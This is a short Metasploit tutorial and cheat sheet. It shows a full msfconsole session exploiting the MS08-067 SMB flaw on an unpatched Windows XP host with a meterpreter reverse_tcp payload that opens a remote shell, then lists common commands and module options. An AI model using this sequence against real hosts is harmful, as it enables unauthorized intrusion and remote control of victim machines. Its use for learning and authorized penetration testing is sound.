Metasploit

• general example
• useful commands
  • search for an explizit exploit
  • show available exploits
  • show all payloads
  • show infos yout an exploit
  • show infos about a payload
  • show options

general example

running an exploit against netapi on a windows xp host
working for UNPATCHED WinXP-SP3 hosts…

# msfconsole

[snipped some info output]

msf > search ms08_067

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Microsoft Server Service Relative Path Stack Corruption


msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set LHOST 10.0.my.host
LHOST => 10.0.my.host
msf  exploit(ms08_067_netapi) > set RHOST 10.0.victim.host
RHOST => 10.0.victim.host

msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.0.my.host:4444
[-] Exploit exception: The connection timed out (10.0.victim.host:445).
[*] Exploit completed, but no session was created.
msf  exploit(ms08_067_netapi) >

and as you can see: the host is patched 😉

explaining the output:

1. 1st starting msfconsole
2. search for vulnerability-exploit ms08_067 and get the full path to the exploit
3. say use the exploit
4. set the local IP address (attacking host-ip) LHOST
5. set the remote IP address (victim host) RHOST
6. set the payload to send to victim host windows/meterpreter/reverse_tcp
   which opens a revers tcp-connection
7. start exploiting: exploit

if the exploit was successful, you will get a prompt like this:

meterpreter> 
meterpreter> shell
[snipped output of starting windows cmd]

useful commands

some useful commands…

search for an explizit exploit

search ms08_067

show available exploits

show exploits

show all payloads

show payloads

show infos yout an exploit

info exploit exploit/windows/smb/ms08_067_netapi

show infos about a payload

info payload windows/meterpreter/reverse_tcp

show options

if exploit and/or payload is already set, it will display informations about:

msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf  exploit(ms08_067_netapi) >